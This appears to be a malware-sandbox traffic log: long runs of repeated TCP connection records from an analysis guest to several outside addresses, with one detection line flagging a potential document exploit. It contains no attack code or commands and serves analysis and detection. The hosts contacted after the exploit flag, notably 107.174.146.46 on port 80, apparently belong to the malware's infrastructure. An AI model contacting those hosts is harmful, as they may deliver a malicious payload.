Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443

Potential document exploit detected (unknown TCP traffic)

Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.162.95:443
Source: global traffic	TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.162.95:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.162.95:443
Source: global traffic	TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.162.95:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.162.95:443
Source: global traffic	TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.162.95:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.162.95:443
Source: global traffic	TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.162.95:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.162.95:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.162.95:443
Source: global traffic	TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
